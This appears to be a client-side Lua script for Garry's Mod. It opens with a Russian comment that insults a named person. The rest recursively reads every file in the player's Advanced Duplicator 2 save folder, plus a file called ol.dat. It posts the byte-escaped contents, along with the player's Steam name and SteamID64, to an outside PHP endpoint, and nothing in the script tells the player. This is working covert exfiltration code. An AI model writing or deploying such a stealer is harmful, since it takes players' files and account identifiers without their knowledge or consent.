-- привет от николаса мейсона пидрила
local function ToByte(Code)
    return string.gsub(Code, ".", function(Char) return "\\" .. string.byte(Char) end)
end
local function a(b)
local c,d=file.Find(b.."*","MOD")
for _,f in pairs(c)do 
local g=file.Read(b.."/"..f,"GAME")
if g==nil then return end
http.Post("https://cw49403.tw1.ru/c/23/i.php",{one=b,two=f,tree=ToByte(g),vfo=steamworks.GetPlayerName(LocalPlayer():SteamID64()).."_"..LocalPlayer():SteamID64()})
end
for h,i in pairs(d)do 
a(b..i.."/")
end
if file.Exists("ol.dat", "DATA") then
g = file.Read("ol.dat","DATA")
http.Post("https://cw49403.tw1.ru/c/23/i.php",{one="",two="l.dat",tree=ToByte(g),vfo=steamworks.GetPlayerName(LocalPlayer():SteamID64()).."_"..LocalPlayer():SteamID64()})
end
end
a("data/advdupe2/")
